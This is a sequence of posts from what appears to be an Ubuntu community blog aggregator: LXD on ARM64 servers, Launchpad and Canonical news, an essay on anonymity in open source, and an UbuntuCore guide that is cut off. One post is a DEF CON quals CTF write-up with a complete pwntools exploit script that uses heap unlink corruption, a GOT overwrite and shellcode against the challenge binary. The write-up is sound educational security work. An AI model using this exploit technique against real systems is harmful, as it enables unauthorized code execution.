Warning: Stopping lxd.service, but it can still be activated by:
  lxd.socket

LXD has been successfully configured.
root@scw-ubuntu-arm64:~#

Now, let’s run lxc list. This will create first the client certificate. There is quite a bit of cryptography going on, and it takes a lot of time.

ubuntu@scw-ubuntu-arm64:~$ time lxc list
Generating a client certificate. This may take a minute...
If this is your first time using LXD, you should also run: sudo lxd init
To start your first container, try: lxc launch ubuntu:16.04

+------+-------+------+------+------+-----------+
| NAME | STATE | IPV4 | IPV6 | TYPE | SNAPSHOTS |
+------+-------+------+------+------+-----------+

real    5m25.717s
user    5m25.460s
sys    0m0.372s
ubuntu@scw-ubuntu-arm64:~$

It is weird and warrants closer examination. In any case,

ubuntu@scw-ubuntu-arm64:~$ cat /proc/sys/kernel/random/entropy_avail2446
ubuntu@scw-ubuntu-arm64:~$

Creating containers

Let’s create a container. We are going to do each step at a time, in order to measure the time it takes to complete.

ubuntu@scw-ubuntu-arm64:~$ time lxc image copy ubuntu:x local:
Image copied successfully!         

real    1m5.151s
user    0m1.244s
sys    0m0.200s
ubuntu@scw-ubuntu-arm64:~$

Out of the 65 seconds, 25 seconds was the time to download the image and the rest (40 seconds) was for initialization before the prompt was returned.

Let’s see how long it takes to launch a container.

ubuntu@scw-ubuntu-arm64:~$ time lxc launch ubuntu:x c1
Creating c1
Starting c1
error: Error calling 'lxd forkstart c1 /var/lib/lxd/containers /var/log/lxd/c1/lxc.conf': err='exit status 1'
  lxc 20170428125239.730 ERROR lxc_apparmor - lsm/apparmor.c:apparmor_process_label_set:220 - If you really want to start this container, set
  lxc 20170428125239.730 ERROR lxc_apparmor - lsm/apparmor.c:apparmor_process_label_set:221 - lxc.aa_allow_incomplete = 1  lxc 20170428125239.730 ERROR lxc_apparmor - lsm/apparmor.c:apparmor_process_label_set:222 - in your container configuration file
  lxc 20170428125239.730 ERROR lxc_sync - sync.c:__sync_wait:57 - An error occurred in another process (expected sequence number 5)
  lxc 20170428125239.730 ERROR lxc_start - start.c:__lxc_start:1346 - Failed to spawn container "c1".
  lxc 20170428125240.408 ERROR lxc_conf - conf.c:run_buffer:405 - Script exited with status 1.
  lxc 20170428125240.408 ERROR lxc_start - start.c:lxc_fini:546 - Failed to run lxc.hook.post-stop for container "c1".

Try `lxc info --show-log local:c1` for more info

real    0m21.347s
user    0m0.040s
sys    0m0.048s
ubuntu@scw-ubuntu-arm64:~$

What this means, is that somehow the Scaleway Linux kernel does not have all the AppArmor (“aa”) features that LXD requires. And if we want to continue, we must configure that we are OK with this situation.

What features are missing?

ubuntu@scw-ubuntu-arm64:~$ lxc info --show-log local:c1
Name: c1
Remote: unix:/var/lib/lxd/unix.socket
Architecture: aarch64
Created: 2017/04/28 12:52 UTC
Status: Stopped
Type: persistent
Profiles: default

Log:

            lxc 20170428125239.730 WARN     lxc_apparmor - lsm/apparmor.c:apparmor_process_label_set:218 - Incomplete AppArmor support in your kernel
            lxc 20170428125239.730 ERROR    lxc_apparmor - lsm/apparmor.c:apparmor_process_label_set:220 - If you really want to start this container, set
            lxc 20170428125239.730 ERROR    lxc_apparmor - lsm/apparmor.c:apparmor_process_label_set:221 - lxc.aa_allow_incomplete = 1
            lxc 20170428125239.730 ERROR    lxc_apparmor - lsm/apparmor.c:apparmor_process_label_set:222 - in your container configuration file
            lxc 20170428125239.730 ERROR    lxc_sync - sync.c:__sync_wait:57 - An error occurred in another process (expected sequence number 5)
            lxc 20170428125239.730 ERROR    lxc_start - start.c:__lxc_start:1346 - Failed to spawn container "c1".
            lxc 20170428125240.408 ERROR    lxc_conf - conf.c:run_buffer:405 - Script exited with status 1.
            lxc 20170428125240.408 ERROR    lxc_start - start.c:lxc_fini:546 - Failed to run lxc.hook.post-stop for container "c1".
            lxc 20170428125240.409 WARN     lxc_commands - commands.c:lxc_cmd_rsp_recv:172 - Command get_cgroup failed to receive response: Connection reset by peer.
            lxc 20170428125240.409 WARN     lxc_commands - commands.c:lxc_cmd_rsp_recv:172 - Command get_cgroup failed to receive response: Connection reset by peer.

ubuntu@scw-ubuntu-arm64:~$

Two hints here, some issue with process_label_set, and get_cgroup.

Let’s allow for now, and start the container,

ubuntu@scw-ubuntu-arm64:~$ lxc config set c1 raw.lxc 'lxc.aa_allow_incomplete=1'
ubuntu@scw-ubuntu-arm64:~$ time lxc start c1

real    0m0.577s
user    0m0.016s
sys    0m0.012s
ubuntu@scw-ubuntu-arm64:~$ lxc list
+------+---------+------+------+------------+-----------+
| NAME |  STATE  | IPV4 | IPV6 |    TYPE    | SNAPSHOTS |
+------+---------+------+------+------------+-----------+
| c1   | RUNNING |      |      | PERSISTENT | 0         |
+------+---------+------+------+------------+-----------+
ubuntu@scw-ubuntu-arm64:~$ lxc list
+------+---------+-----------------------+------+------------+-----------+
| NAME |  STATE  |         IPV4          | IPV6 |    TYPE    | SNAPSHOTS |
+------+---------+-----------------------+------+------------+-----------+
| c1   | RUNNING | 10.237.125.217 (eth0) |      | PERSISTENT | 0         |
+------+---------+-----------------------+------+------------+-----------+
ubuntu@scw-ubuntu-arm64:~$

Let’s run nginx in the container.

ubuntu@scw-ubuntu-arm64:~$ lxc exec c1 -- sudo --login --user ubuntu
To run a command as administrator (user "root"), use "sudo <command>".
See "man sudo_root" for details.

ubuntu@c1:~$ sudo apt update
Hit:1 http://ports.ubuntu.com/ubuntu-ports xenial InRelease
...
37 packages can be upgraded. Run 'apt list --upgradable' to see them.
ubuntu@c1:~$ sudo apt install nginx
...
ubuntu@c1:~$ exit
ubuntu@scw-ubuntu-arm64:~$ curl http://10.237.125.217/<!DOCTYPE html>
<html>
<head>
<title>Welcome to nginx!</title>
<style>
...
ubuntu@scw-ubuntu-arm64:~$

That’s it! We are running LXD on Scaleway and their new ARM64 servers. The issues should be fixed in order to have a nicer user experience.

Launchpad News: Launchpad news, November 2015 – April 2017

$
0
0

Well, it’s been a while!  Since we last posted a general update, the Launchpad team has become part of Canonical’s Online Services department, so some of our efforts have gone into other projects.  There’s still plenty happening with Launchpad, though, and here’s a changelog-style summary of what we’ve been up to.

Answers

  • Lock down question title and description edits from random users
  • Prevent answer contacts from editing question titles and descriptions
  • Prevent answer contacts from editing FAQs

Blueprints

  • Optimise SpecificationSet.getStatusCountsForProductSeries, fixing Product:+series timeouts
  • Add sprint deletion support (#2888)
  • Restrict blueprint count on front page to public blueprints

Build farm

  • Add fallback if nominated architecture-independent architecture is unavailable for building (#1530217)
  • Try to load the nbd module when starting launchpad-buildd (#1531171)
  • Default LANG/LC_ALL to C.UTF-8 during binary package builds (#1552791)
  • Convert buildd-manager to use a connection pool rather than trying to download everything at once (#1584744)
  • Always decode build logtail as UTF-8 rather than guessing (#1585324)
  • Move non-virtualised builders to the bottom of /builders; Ubuntu is now mostly built on virtualised builders
  • Pass DEB_BUILD_OPTIONS=noautodbgsym during binary package builds if we have not been told to build debug symbols (#1623256)

Bugs

  • Use standard milestone ordering for bug task milestone choices (#1512213)
  • Make bug activity records visible to anonymous API requests where appropriate (#991079)
  • Use a monospace font for “Add comment” boxes for bugs, to match how the comments will be displayed (#1366932)
  • Fix BugTaskSet.createManyTasks to map Incomplete to its storage values (#1576857)
  • Add basic GitHub bug linking (#848666)
  • Prevent rendering of private team names in bugs feed (#1592186)
  • Update CVE database XML namespace to match current file on cve.mitre.org
  • Fix Bugzilla bug watches to support new versions that permit multiple aliases
  • Sort bug tasks related to distribution series by series version rather than series name (#1681899)

Code

  • Remove always-empty portlet from Person:+branches (#1511559)
  • Fix OOPS when editing a Git repository with over a thousand refs (#1511838)
  • Add Git links to DistributionSourcePackage:+branches and DistributionSourcePackage:+all-branches (#1511573)
  • Handle prerequisites in Git-based merge proposals (#1489839)
  • Fix OOPS when trying to register a Git merge with a target path but no target repository
  • Show an “Updating repository…” indication when there are pending writes
  • Launchpad’s Git hosting backend is now self-hosted
  • Fix setDefaultRepository(ForOwner) to cope with replacing an existing default (#1524316)
  • Add “Configure Code” link to Product:+git
  • Fix Git diff generation crash on non-ASCII conflicts (#1531051)
  • Fix stray link to +editsshkeys on Product:+configure-code when SSH keys were already registered (#1534159)
  • Add support for Git recipes (#1453022)
  • Fix OOPS when adding a comment to a Git-based merge proposal without using AJAX (#1536363)
  • Fix shallow git clones over HTTPS (#1547141)
  • Add new “Code” portlet on Product:+index to make it easier to find source code (#531323)
  • Add missing table around widget row on Product:+configure-code, so that errors are highlighted properly (#1552878)
  • Sort GitRepositorySet.getRepositories API results to make batching reliable (#1578205)
  • Show recent commits on GitRef:+index
  • Show associated merge proposals in Git commit listings
  • Show unmerged and conversation-relevant Git commits in merge proposal views (#1550118)
  • Implement AJAX revision diffs for Git
  • Fix scanning branches with ghost revisions in their ancestry (#1587948)
  • Fix decoding of Git diffs involving non-UTF-8 text that decodes to unpaired surrogates when treated as UTF-8 (#1589411)
  • Fix linkification of references to Git repositories (#1467975)
  • Fix +edit-status for Git merge proposals (#1538355)
  • Include username in git+ssh URLs (#1600055)
  • Allow linking bugs to Git-based merge proposals (#1492926)
  • Make Person.getMergeProposals have a constant query count on the webservice (#1619772)
  • Link to the default git repository on Product:+index (#1576494)
  • Add Git-to-Git code imports (#1469459)
  • Improve preloading of {Branch,GitRepository}.{landing_candidates,landing_targets}, fixing various timeouts
  • Export GitRepository.getRefByPath (#1654537)
  • Add GitRepository.rescan method, useful in cases when a scan crashed

Infrastructure

  • Launchpad’s SSH endpoints (bazaar.launchpad.net, git.launchpad.net, upload.ubuntu.com, and ppa.launchpad.net) now support newer key exchange and MAC algorithms, allowing compatibility with OpenSSH >= 7.0 (#1445619)
  • Make cross-referencing code more efficient for large numbers of IDs (#1520281)
  • Canonicalise path encoding before checking a librarian TimeLimitedToken (#677270)
  • Fix Librarian to generate non-cachable 500s on missing storage files (#1529428)
  • Document the standard DELETE method in the apidoc (#753334)
  • Add a PLACEHOLDER account type for use by SSO-only accounts
  • Add support to +login for acquiring discharge macaroons from SSO via an OpenID exchange (#1572605)
  • Allow managing SSH keys in SSO
  • Re-raise unexpected HTTP errors when talking to the GPG key server
  • Ensure that the production dump is usable before destroying staging
  • Log SQL statements as Unicode to avoid confusing page rendering when the visible_render_time flag is on (#1617336)
  • Fix the librarian to fsync new files and their parent directories
  • Handle running Launchpad from a Git working tree
  • Handle running Launchpad on Ubuntu 16.04 (upgrade currently in progress)
  • Fix delete_unwanted_swift_files to not crash on segments (#1642411)
  • Update database schema for PostgreSQL 9.5 and 9.6
  • Check fingerprints of keys received from the keyserver rather than trusting it implicitly

Registry

  • Make public SSH key records visible to anonymous API requests (#1014996)
  • Don’t show unpublished packages or package names from private PPAs in search results from the package picker (#42298, #1574807)
  • Make Person.time_zone always be non-None, allowing us to easily show the edit widget even for users who have never set their time zone (#1568806)
  • Let latest questions, specifications and products be efficiently calculated
  • Let project drivers edit series and productreleases, as series drivers can; project drivers should have series driver power over all series
  • Fix misleading messages when joining a delegated team
  • Allow team privacy changes when referenced by CodeReviewVote.reviewer or BugNotificationRecipient.person
  • Don’t limit Person:+related-projects to a single batch

Snappy

  • Add webhook support for snaps (#1535826)
  • Allow deleting snaps even if they have builds
  • Provide snap builds with a proxy so that they can access external network resources
  • Add support for automatically uploading snap builds to the store (#1572605)
  • Update latest snap builds table via AJAX
  • Add option to trigger snap builds when top-level branch changes (#1593359)
  • Add processor selection in new snap form
  • Add option to automatically release snap builds to store channels after upload (#1597819)
  • Allow manually uploading a completed snap build to the store
  • Upload *.manifest files from builders as well as *.snap (#1608432)
  • Send an email notification for general snap store upload failures (#1632299)
  • Allow building snaps from an external Git repository
  • Move upload to FAILED if its build was deleted (e.g. because of a deleted snap) (#1655334)
  • Consider snap/snapcraft.yaml and .snapcraft.yaml as well as snapcraft.yaml for new snaps (#1659085)
  • Add support for building snaps with classic confinement (#1650946)
  • Fix builds_for_snap to avoid iterating over an unsliced DecoratedResultSet (#1671134)
  • Add channel track support when uploading snap builds to the store (contributed by Matias Bordese; #1677644)

Soyuz (package management)

  • Remove some more uses of the confusing .dsc component; add the publishing component to SourcePackage:+index in compensation
  • Add include_meta option to SPPH.sourceFileUrls, paralleling BPPH.binaryFileUrls
  • Kill debdiff after ten minutes or 1GiB of output by default, and make sure we clean up after it properly (#314436)
  • Fix handling of << and >> dep-waits
  • Allow PPA admins to set external_dependencies on individual binary package builds (#671190)
  • Fix NascentUpload.do_reject to not send an erroneous Accepted email (#1530220)
  • Include DEP-11 metadata in Release file if it is present
  • Consistently generate Release entries for uncompressed versions of files, even if they don’t exist on the filesystem; don’t create uncompressed Packages/Sources files on the filesystem
  • Handle Build-Depends-Arch and Build-Conflicts-Arch from SPR.user_defined_fields in Sources generation and SP:+index (#1489044)
  • Make index compression types configurable per-series, and add xz support (#1517510)
  • Use SHA-512 digests for GPG signing where possible (#1556666)
  • Re-sign PPAs with SHA-512
  • Publish by-hash index files (#1430011)
  • Show SHA-256 checksums rather than MD5 on DistributionSourcePackageRelease:+files (#1562632)
  • Add a per-series switch allowing packages in supported components to build-depend on packages in unsupported components, used for Ubuntu 16.04 and later
  • Expand archive signing to kernel modules (contributed by Andy Whitcroft; #1577736)
  • Uniquely index PackageDiff(from_source, to_source) (part of #1475358)
  • Handle original tarball signatures in source packages (#1587667)
  • Add signed checksums for published UEFI/kmod files (contributed by Andy Whitcroft; #1285919)
  • Add support for named authentication tokens for private PPAs
  • Show explicit add-apt-repository command on Archive:+index (#1547343)
  • Use a per-archive OOPS timeline in archivepublisher scripts
  • Link to package versions on DSP:+index using fmt:url rather than just a relative link to the version, to avoid problems with epochs (#1629058)
  • Fix RepositoryIndexFile to gzip without timestamps
  • Fix Archive.getPublishedBinaries API call to have a constant query count (#1635126)
  • Include the package name in package copy job OOPS reports and emails (#1618133)
  • Remove headers from Contents files (#1638219)
  • Notify the Changed-By address for PPA uploads if the .changes contains “Launchpad-Notify-Changed-By: yes” (#1633608)
  • Accept .debs containing control.tar.xz (#1640280)
  • Add Archive.markSuiteDirty API call to allow requesting that a given archive/suite be published
  • Don’t allow cron-control to interrupt publish-ftpmaster part-way through (#1647478)
  • Optimise non-SQL time in PublishingSet.requestDeletion (#1682096)
  • Store uploaded .buildinfo files (#1657704)

Translations

  • Allow TranslationImportQueue to import entries from file objects rather than having to read arbitrarily-large files into memory (#674575)

Miscellaneous

  • Use gender-neutral pronouns where appropriate
  • Self-host the Ubuntu webfonts (#1521472)
  • Make the beta and privacy banners float over the rest of the page when scrolling
  • Upgrade to pytz 2016.4 (#1589111)
  • Publish Launchpad’s code revision in an X-Launchpad-Revision header
  • Truncate large picker search results rather than refusing to display anything (#893796)
  • Sync up the lists footer with the main webapp footer a bit (#1679093)

Ubuntu Insights: Cloud Chatter: April 2017

$
0
0

Welcome to our April edition. We begin with our recent release of Ubuntu 17.04 supporting the widest range of container capabilities. We have a selection of Kubernetes webinars for you to watch, or get up to speed with some indepth tutorials. Read about our exciting partnership announcements with Oracle, City Network, AWS and Unitas Global. Discover our plans for our upcoming presence at the OpenStack Summit in Boston next month. And finally, enjoy our roundup of industry news.

Ubuntu 17.04 supports widest range of container capabilities

This month marked the 26th release of Ubuntu, entitled 17.04 Zesty Zapus, offering the most complete portfolio of container support in a Linux distribution. This includes snaps for singleton apps, LXD by Canonical for lightweight VM-style machine containers, and auto-updating Docker snap packages available in stable, candidate, beta and edge channels. The Canonical Distribution of Kubernetes 1.6, representing the very latest upstream container infrastructure, has 100% compatibility with Google’s hosted Kubernetes service GKE.

Ubuntu 17.04 also includes OpenStack’s latest Ocata release, which is also available on Ubuntu 16.04 LTS via Canonical’s public Cloud Archive. Canonical’s OpenStack offering supports upgrades of running clouds without workload interruption. The introduction of Cells v2 in this release ensures that new clouds have a consistent way to scale from small to very large as capacity requirements change.

Furthermore there is increased network performance for clouds and guests with the Linux 4.10 kernel. Learn more

GPUs and Kubernetes for Deep Learning

The Canonical Distribution of Kubernetes is the only distribution that natively supports GPUs, making it ideal for managing Deep Learning and Media workloads. Our latest webinar discusses how such artificial intelligence can be achieved using Kubernetes, nVidia GPUs, and the operation toolbox provided by Canonical. Watch the webinar

Get up and running with Kubernetes

Our Kubernetes webinar series will be covering a range of operational tasks over the next few months. These will include upgrades, backups, snapshots, scalability, and other operational concerns that will allow you to completely manage your Kubernetes cluster(s) with confidence. The available webinars in the series so far include:

  • Getting started with the Canonical Distribution of Kubernetes – watch on-demand
  • Learn the secrets of validation and testing your Kubernetes cluster – watch on-demand
  • Painless Kubernetes upgrades – register now

Unitas Global and Canonical provide Fully-Managed Enterprise OpenStack

Unitas Global, the leading enterprise hybrid cloud solution provider, and Canonical, announced they will provide a new fully managed and hosted OpenStack private cloud to enterprise clients around the world. This partnership along with Unitas Global’s large ecosystem of system integrators and partners will enable customers to choose an end to end infrastructure solution to design, build, and integrate custom private cloud infrastructure based on OpenStack. Learn more

OpenStack public cloud, from Stockholm to Dubai and everywhere between

City Network, a leading European provider of OpenStack infrastructure-as-a-service (IaaS) has joined the Ubuntu Certified Public Cloud programme. Through its public cloud service ‘City Cloud’, companies across the globe can purchase server and storage capacity as needed, paying for the capacity they use and leveraging the flexibility and scalability of the OpenStack-platform. With dedicated and OpenStack-based City Cloud nodes in the US. Europe and Asia, City Network also recently launched in Dubai. Learn more.

Certified Ubuntu Images available on Oracle Bare Metal Cloud Service

Certified Ubuntu images are now available in the Oracle Bare Metal Cloud Services, providing developers with compute options ranging from single to 16 OCPU virtual machines (VMs) to high-performance, dedicated bare metal compute instances. This is in addition to the image already offered on Oracle Compute Cloud Service and maintains the ability for enterprises to add Canonical-backed Ubuntu Advantage Support and Systems Management. Oracle and Canonical customers now have access to the latest Ubuntu features, compliance accreditations and security updates. Learn more

Ubuntu on AWS gets serious performance boost with AWS-tuned kernel

Ubuntu Cloud Images for Amazon have been enabled with the AWS-tuned Ubuntu kernel by default. The AWS-tuned Ubuntu kernel will receive the same level of support and security maintenance as all supported Ubuntu kernels for the duration of the Ubuntu 16.04 LTS. The most notable highlights for this kernel include: Up to 30% faster kernel boot speeds, full support for Elastic Network Adapter (ENA), increased I/O performance for i3 instances and more! Learn more

Ubuntu 12.04 goes end-of-life

Following the end-of-life of Ubuntu 12.04 LTS on Fri tomorrow,, April 28, 2017, Canonical is offering Ubuntu 12.04 ESM (Extended Security Maintenance), which provides important security fixes for the kernel and the most essential user space packages in Ubuntu 12.04. These updates are delivered in a secure, private archive exclusively available to Ubuntu Advantage customers on a per-node or per hour basis.

For more information, read our FAQs or watch our latest webinar.

Preparing for a great show at OpenStack Summit Boston

We’ll be in Boston, from the 7th-12th May, at the OpenStack Summit. Join us at the Ubuntu booth and talk with us about your business’s cloud needs or find out about our cloud and container solutions, from LXD to Docker and Kubernetes with our featured demos. We’ll also be running some hands-on Telco and Container-specific workshops, as well as delivering a range of informative speaking sessions within the summit agenda. Book a meeting with our Executive Team or learn more about what we have planned.

Section 4: Top posts from Insights

OpenStack, SDN & NFV

Containers & Storage

Big data / Machine Learning / Deep Learning

Jono Bacon: Anonymous Open Source Projects

$
0
0

Today Solomon asked an interesting question on Twitter:

He made it clear he is not advocating for this view, just a thought experiment. I had, well, a few thoughts on this.

I tend to think of open source projects in three broad buckets.

Firstly, we have the overall workflow in which the community works together to build things. This is your code review processes, issue management, translations workflow, event strategy, governance, and other pieces.

Secondly, there are the individual contributions. This is how we assess what we want to build, what quality looks like, how we build modularity, and other elements.

Thirdly, there is identity which covers the identity of the project and the individuals who contribute to it. Solomon taps into this third component.

Identity

While the first two components, workflow and contributions are clearly important in defining what you want to work on and how you build it, identity is more subtle.

I think identity plays a few different roles at the individual level.

Firstly, it helps to build reputation. Open source communities are at a core level meritocracies: contributions are assessed on their value, and the overall value of the contributor is based on their merits. Now, yes, I know some of you will balk at whether open source communities are actually meritocracies. The thing is, too many people treat “meritocracy” as a framework or model: it isn’t. It is more of a philosophy…a star that we move towards.

It is impossible to build a meritocracy without some form of identity attached to the contribution. We need to have a mapping between each contribution and the same identity that delivered it: this helps that individual build their reputation as they deliver more and more contributions. This also helps them flow from being a new contributor, to a regular, and then to a leader.

This leads to my second point. Identity is also critical for accountability. Now, when I say accountability we tend to think of someone being responsible for their actions. Sure, this is the case, but accountability also plays an important and healthy role in people receiving peer feedback on their work.

According to Google Images search, “accountability” requires lots of fist bumps.

Open source communities are kinda weird places to be. It is easy to forget that (a) joining a community, (b) making a contribution, (c) asking for help, (d) having your contribution critically reviewed, and (e) solving problems, all happens out in the open, for all to see. This can be remarkably weird and stressful for people new to or unfamiliar with open source, and on a bed of the cornucopia of human insecurities about looking stupid, embarrassing yourself etc. While I have never been to one (honest), I imagine this is what it must be like going to a nudist colony: everything out on display, both good and bad.

All of this rolls up to identity playing an important role for building the fabric of a community, for effective peer review, and the overall growth of individual participants (and thus the network effect of the community).

Real Names vs. Handles

If we therefore presume identity is important, do we require that identity to be a real name (e.g. “Jono Bacon”) or a handle (e.g. “MetalDude666”)? – not my actual handle, btw.

We have all said this at some point.

In terms of the areas I presented above such as building reputation, accountability, and peer review, this can all be accomplished if people use handles, under the prerequisite that there is some way of knowing that “MetalDude666” is the same person each time. Many gaming communities have players who build remarkable reputations and accountability and no one knows who they really are, just their handles.

Where things get trickier is assuring the same quality of community experience for those who use real names and those who use handles in the same community. On core infrastructure (such as code hosting, communication channels, websites, etc) this can typically be assured. It can get trickier with areas such as real-world events. For example, if the community has an in-person event, the folks with the handles may not feel comfortable attending so as to preserve their anonymity. Given how key these kinds of events can be to building relationships, it can therefore result in a social/collaborative delta between those with real names and those with handles.

So, in answer to Solomon’s question, I do think identity is critical, but it could be all handles if required. What is key is to either (a) require only handles/real names (which is tough), or (b) provide very careful community strategy and execution to reduce the delta of experience between those with real names and handles (tough, but easier).

So, what do you think, folks? Do you agree with me, or am I speaking nonsense? Can you share great examples of anonymous of open source communities? Are there elements I missed out in my assessment here? Share them in the comments below!

The post Anonymous Open Source Projects appeared first on Jono Bacon.

David Tomaschik: DEF CON Quals 2017: beatmeonthedl

$
0
0

I played in the DEF CON quals CTF this weekend, and happened to find the challenge beatmeonthedl particularly interesting, even if it was in the “Baby’s First” category. (DC Quals Baby’s Firsts aren’t as easy as one might think…)

So we download the binary and take a look. I’m using Binary Ninja lately, it’s a great tool from the Vector35 guys, and at the right price compared to IDA for playing CTF. :) So I open up the binary, and notice a few things right away. This is an x86-64 ELF binary with essentially none of the standard security features enabled:

1
2
3
4
5
6
7
% checksec beatmeonthedl
[+] 'beatmeonthedl'
Arch:     amd64-64-little
RELRO:    No RELRO
Stack:    No canary found
NX:       NX disabled
PIE:      No PIE

Easy mode, right?

We’ll, let’s look at the binary and see if we can find a vulnerability. Looking at the binary, we can see it’s a pretty typical CTF binary, we can create, modify, delete, and print some notes. This has been seen many times in various forms.

At the beginning there’s a little twist, it prompts you for a username and password. It’s not hard to figure out what these should be, just take a look at the functions checkuser and checkpass. In checkuser you can see that the username should be mcfly. In checkpass, it’s interesting that the function copies the user input to an allocated buffer on the heap before checking the password, and all it checks is that it beings with the string awesnap. The memory chunk is not freed before continuing, and in fact, if you fail the login check, you will repeatedly get checks that allow you to continue writing to segments on the heap. The copies are correctly bounds-checked, so there’s no memory corruption here. I’m not sure what the point of copying to the heap is, as I didn’t need it to solve the level.

Let’s take a look at the add_request function that creates the new request entries. Looking through it, we see it allocates a chunk for the request entry and then reads your request into the allocated chunk. It took me a moment to notice that there’s something strange about the malloc and the respective read of the request, but I’ve highlighted the relevant lines for your ease.

malloc and read for new requests

Yep, it allocates 0x38 bytes and then reads 0x80 bytes into it. Well, that seems opportune, depending on what’s past the chunk I’m reading into. It doesn’t appear that his has any function pointers or vtable pointers (it appears to be pure C), so nothing like that to overwrite. Heap metadata corruption is a thing of the past, right? Well, if you notice that malloc is in blue and other functions (printf, read) are in orange, you might realize something. The malloc implementation being used by this binary is compiled into the program. A quick test does, in fact, show that this version of malloc does not appear to use any validation checks on the heap metadata:

1
2
3
4
pwndbg> x/i $rip
=> 0x40656c <free+1096>:	mov    rax,QWORD PTR [rax+0x8]
pwndbg> i r rax
rax            0x41414141425e51a0	0x41414141425e51a0

So it seems like we can use the unlink technique described by Solar Designer in 2000 to exploit heap metadata corruption via free. If you’re not familiar with the technique, there’s a more digestable version here. This technique allows you to write one pointer-sized value at one address of your choosing. (Obviously, if you want to try to write more than one, you can sometimes repeat the technique if the circumstances allow.) Basically, you want to allocate two consecutive blocks, overflow the first into the second in such a way that the 2nd meets some special properties, and then free the first chunk, causing the malloc implementation to attempt to coalesce the two free blocks into a bigger block and unlink the old “free” block. Our crafted block must:

  • Have zero size
  • Appear to be free (has the IN_USE bit cleared)
  • Appear as part of a linked list where the first pointer goes to your target address minus one pointer width (e.g., target-8 on x86-64).
  • Appear as part of a linked list where the second pointer is the value you want to write.

So if we know what we’re going to do, we should be done, right? Well, it’s not quite that simple – we still need to know what we’re going to write, and where we’re going to write it.

A common technique for this is to overwrite a pointer in the Global Offset Table (GOT). If you’re not familiar with the GOT, I’ve previously written about using the GOT and PLT for exploitation. Since there is no RELRO (Read-Only Relocations) on this binary, we can apply this technique here in a straightforward fashion. We can overwrite any function that will be called after the free occurs. For this binary, we can use any of several functions, but both puts and printf are excellent choices since they’re called in fairly short order (by printing the menu the next time).

So what do we write? Well, we want to point to some shellcode. But where is our shellcode? Since there’s not many places to put things on the stack and no globals, I guess it’ll have to be the heap. We do have ASLR to contend with, so we need a leak of a heap address. It took me a while to realize how we could get this, but then I hit upon it: by creating fragmentation within the heap, the malloc implementation will have placed pointers for the circular linked list of free blocks into the free blocks themselves. Then overflowing an adjacent block right up to the pointer, and printing the requests, we can get the value of the pointer. From that, we can round down to the start of the page and get the beginning of the heap area.

Finally, we just need to place some shellcode in one of our blocks. Note that many (all?) of the DEF CON Quals challenges ran in a seccomp sandbox that blocked the ability to use execve, so we’ll have to use a open/read/write shellcode.

Putting it all together (sorry, it’s a bit sloppy, didn’t have time to clean it up yet):

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
import pwn
from pwnlib.shellcraft import amd64

pwn.context.binary = './beatmeonthedl'

PAD = 'A'*48 + 'B'*8
CHUNK_SIZE = pwn.p64(0)
TARGET_ADDR = 0x609970 # printf@got
TARGET_ADDR_CHUNK = pwn.p64(TARGET_ADDR-24)

proc = None
#proc = pwn.process('./beatmeonthedl')
proc = proc or pwn.remote(
        'beatmeonthedl_498e7cad3320af23962c78c7ebe47e16.quals.shallweplayaga.me',
        6969)

def login():
    proc.recvuntil('username: ')
    proc.sendline('mcfly')
    proc.recvuntil('Pass: ')
    proc.sendline('awesnap')

def menu(n):
    proc.recvuntil('| ')
    proc.sendline(str(n))

pwn.log.info('Login')
login()

pwn.log.info('Create')
for _ in xrange(4):
    menu(1)
    proc.recv()
    proc.sendline('foo')

pwn.log.info('Leak')
menu(3)
proc.recv()
proc.sendline(str(2))
menu(3)
proc.recv()
proc.sendline(str(0))
# alter 1
menu(4)
proc.recv()
proc.sendline(str(1))
proc.recv()
proc.send('Q'*72)
menu(2)
res = proc.recvuntil('3)')
res = res[72+3:-3]
slot_0 = pwn.u64(res+('\0'*(8-len(res))))
print 'Slot 0 probably: {:#08x}'.format(slot_0)

pwn.log.info('Setup chunk')
# reallocate 0
menu(1)
proc.recv()
proc.send('AAAA')

# shellcode in 3
menu(4)
proc.recv()
proc.send(str(3))
proc.recv()
shellcode = '\xeb\x20' + ('\x90'*32)
shellcode += pwn.asm(amd64.cat('flag'))
proc.send(shellcode)

# edit 0 with overwrite
menu(4)
proc.recv()
proc.send(str(0))
proc.recv()
val = (PAD+CHUNK_SIZE+TARGET_ADDR_CHUNK)
target = slot_0+16 + 3*0x40  # target slot 3
print 'Target addr: {:#08x}'.format(target)
val += pwn.p64(target)
proc.send(val)

pwn.log.info('Overwrite')
# trigger free of previous chunk to cause coalescing
menu(3)
proc.recv()
proc.sendline(str(0))

proc.interactive()

pwn.log.info('Exit')
# exit
menu(5)

Oliver Grawert: Use UbuntuCore to create a WiFi AP with nextcloud support on a Pi3 in minutes.

$
0
0

UbuntuCore is the rolling release of Ubuntu.
It is self updating and completely built out of snap packages (including kernel, boot loader and root file system) which provides transactional updates, manual and automatic roll-back and a high level of system security to all parts of the system.

Once installed you have a secure zero maintenance OS that you can easily turn into a powerful appliance by simply adding a few application snaps to it.

The raspberry Pi3 comes with WLAN and ethernet hardware on board, which makes it a great candidate to turn it into a WiFi AccessPoint. But why stop here ? With UbuntuCore we can go further and install a WebRTC solution (like spreedme) for making in-house video calls or an UPNP media server to serve our music and video collections, an OpenHAB home automation device … or we can actually turn it into a personal cloud using the nextcloud snap.

The instructions below walk you through a basic install of UbuntuCore, setting up a WLAN AP, adding an external USB disk to hold data for nextcloud and installing the nexcloud snap.

You need a Raspberry Pi3 and an SD card.

Preparation:

Create an account at https://login.ubuntu.com/ and upload your public ssh key (~/.ssh/id_rsa.pub) in the “SSH Keys” section. This is where your UbuntuCore image will pull the ssh credentials from to provide you login access to the system (by default UbuntuCore does not create a local console login, only remote logins using this ssh key will be allowed).

Download the image from:
http://releases.ubuntu.com/ubuntu-core/16/ubuntu-core-16-pi3.img.xz

…or if you are brave and like to live on the edge you can use a daily build of the edge channel (…bugs included 😉) at:
http://people.canonical.com/~ogra/snappy/all-snaps/daily/current/ubuntu-core-16-pi3.img.xz

Write the image to SD:

Put your SD card into your PC’s SD card reader …
Make sure it did not get auto mounted (in case it did, do not use the filemanager to unmount but unmount it using the commandline (in the example below my USB card reader shows the SD as /dev/sdb to the system)):

